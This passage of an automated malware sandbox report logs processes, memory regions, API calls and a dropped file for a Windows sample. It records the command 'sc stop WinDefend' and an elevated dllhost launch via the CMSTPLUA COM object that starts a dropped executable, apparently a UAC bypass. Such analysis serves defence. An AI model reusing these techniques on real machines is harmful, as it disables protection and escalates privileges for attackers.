wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (3)
»
Operation Filename Additional Information Success Count Logfile
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Write STD_OUTPUT_HANDLE size = 51 True 1
Fn
Data
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\sc.exe base_address = 0x840000 True 1
Fn
Service (2)
»
Operation Additional Information Success Count Logfile
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-06-25 14:54:41 (UTC) True 1
Fn
Get Time type = Ticks, time = 269429 True 1
Fn
Process #20: sc.exe
8 0
»
Information Value
ID #20
File Name c:\windows\syswow64\sc.exe
Command Line sc stop WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
»
Information Value
PID 0x9d8
Parent PID 0x13c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A14
0x A50
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
sc.exe.mui 0x000f0000 0x000fffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x002c0000 0x0037ffff Memory Mapped File Readable, Writable False False False -
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x0046ffff Private Memory Readable, Writable True False False -
private_0x00000000005a0000 0x005a0000 0x0069ffff Private Memory Readable, Writable True False False -
sc.exe 0x00840000 0x0084bfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (3)
»
Operation Filename Additional Information Success Count Logfile
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Write STD_OUTPUT_HANDLE size = 51 True 1
Fn
Data
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\sc.exe base_address = 0x840000 True 1
Fn
Service (2)
»
Operation Additional Information Success Count Logfile
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-06-25 14:54:41 (UTC) True 1
Fn
Get Time type = Ticks, time = 269273 True 1
Fn
Process #21: dllhost.exe
0 0
»
Information Value
ID #21
File Name c:\windows\syswow64\dllhost.exe
Command Line C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:46, Reason: RPC Server
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:22
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x200
Parent PID 0x248 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 6B8
0x 264
0x F8
0x 224
0x 788
0x 40C
0x 5DC
0x 794
0x 468
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000100000 0x00100000 0x00101fff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x00110000 0x00113fff Memory Mapped File Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00130000 0x0014efff Memory Mapped File Readable True False False -
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001dffff Private Memory Readable, Writable True False False -
cversions.2.db 0x001e0000 0x001e3fff Memory Mapped File Readable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f6fff Pagefile Backed Memory Readable True False False -
private_0x0000000000200000 0x00200000 0x0023ffff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0027ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000280000 0x00280000 0x00407fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000410000 0x00410000 0x00411fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000420000 0x00420000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x0052ffff Private Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x005cffff Private Memory Readable, Writable True False False -
dllhost.exe 0x005d0000 0x005d4fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x00000000005e0000 0x005e0000 0x00760fff Pagefile Backed Memory Readable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
private_0x00000000008a0000 0x008a0000 0x008dffff Private Memory Readable, Writable True False False -
private_0x00000000008e0000 0x008e0000 0x0091ffff Private Memory Readable, Writable True False False -
private_0x0000000000920000 0x00920000 0x0095ffff Private Memory Readable, Writable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x00960000 0x0098ffff Memory Mapped File Readable True False False -
private_0x00000000009a0000 0x009a0000 0x009dffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x009e0000 0x00a45fff Memory Mapped File Readable True False False -
private_0x0000000000a50000 0x00a50000 0x00a5ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000a60000 0x00a60000 0x01e5ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01e60000 0x0212efff Memory Mapped File Readable False False False -
private_0x00000000021a0000 0x021a0000 0x021dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021e0000 0x021e0000 0x022befff Pagefile Backed Memory Readable True False False -
private_0x0000000002350000 0x02350000 0x0238ffff Private Memory Readable, Writable True False False -
private_0x0000000002400000 0x02400000 0x0243ffff Private Memory Readable, Writable True False False -
private_0x0000000002440000 0x02440000 0x0253ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002540000 0x02540000 0x02932fff Pagefile Backed Memory Readable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x753c0000 0x753edfff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x75460000 0x754abfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x754b0000 0x755a4fff Memory Mapped File Readable, Writable, Executable False False False -
cmlua.dll 0x755f0000 0x755fbfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75600000 0x75608fff Memory Mapped File Readable, Writable, Executable False False False -
cmutil.dll 0x75610000 0x7561dfff Memory Mapped File Readable, Writable, Executable False False False -
cmstplua.dll 0x75620000 0x75627fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #22: oyvhkhw.exe
979 0
»
Information Value
ID #22
File Name c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe
Command Line "C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:46, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:22
OS Process Information
»
Information Value
PID 0x3d4
Parent PID 0x200 (c:\windows\syswow64\dllhost.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 6A0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
private_0x00000000000a0000 0x000a0000 0x000affff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False -
private_0x00000000000d0000 0x000d0000 0x0014ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000150000 0x00150000 0x00151fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x00161fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x0027ffff Private Memory Readable, Writable True False False -
locale.nls 0x00280000 0x002e6fff Memory Mapped File Readable False False False -
private_0x00000000002f0000 0x002f0000 0x0039ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x002f0000 0x0032bfff Memory Mapped File Readable False False False -
~df0894a2d8a2a8bfc2.tmp 0x002f0000 0x0036ffff Memory Mapped File Readable, Writable True True False
private_0x0000000000390000 0x00390000 0x0039ffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False -
oyvhkhw.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
private_0x000000000cc60000 0x0cc60000 0x0cc6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cc70000 0x0cc70000 0x0cdf0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce00000 0x0ce00000 0x0e1fffff Pagefile Backed Memory Readable True False False -
private_0x000000000e200000 0x0e200000 0x0e5fffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e600000 0x0e8cefff Memory Mapped File Readable False False False -
private_0x000000000e8d0000 0x0e8d0000 0x0e97ffff Private Memory Readable, Writable True False False -
private_0x000000000e980000 0x0e980000 0x0eaeffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e980000 0x0e980000 0x0ea5efff Pagefile Backed Memory Readable True False False -
private_0x000000000eab0000 0x0eab0000 0x0eaeffff Private Memory Readable, Writable True False False -
private_0x000000000eaf0000 0x0eaf0000 0x0ec6ffff Private Memory Readable, Writable True False False -
private_0x000000000eaf0000 0x0eaf0000 0x0eb6ffff Private Memory Readable, Writable True False False -
private_0x000000000ec30000 0x0ec30000 0x0ec6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ec70000 0x0ec70000 0x0f06ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f070000 0x0f070000 0x0f462fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f470000 0x0fd9ffff Memory Mapped File Readable False False False -
private_0x000000000fda0000 0x0fda0000 0x0fe9ffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\~df0894a2d8a2a8bfc2.tmp 16.00 KB MD5: ce338fe6899778aacfc28414f2d9498b
SHA1: 897256b6709e1a4da9daba92b6bde39ccfccd8c1
SHA256: 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe
False
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Get Info STD_INPUT_HANDLE type = file_type False 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type False 1
Fn
Get Info STD_ERROR_HANDLE type = file_type False 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors - False 2
Fn
Module (83)
»
Operation Module Additional Information Success Count Logfile
Load OLEAUT32.DLL base_address = 0x75a00000 True 1
Fn
Load SXS.DLL base_address = 0x752d0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Fn
Get Handle c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe base_address = 0x400000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x75a00000 True 1
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75be0000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x771c0000 True 1
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe, size = 260 True 3
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 3
Fn
Get Filename c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsTNT, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = DispCallFunc, address_out = 0x75a13dcf True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDateFromUdate, address_out = 0x75a17684 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetAltMonthNames, address_out = 0x75a4903a True 1
Fn
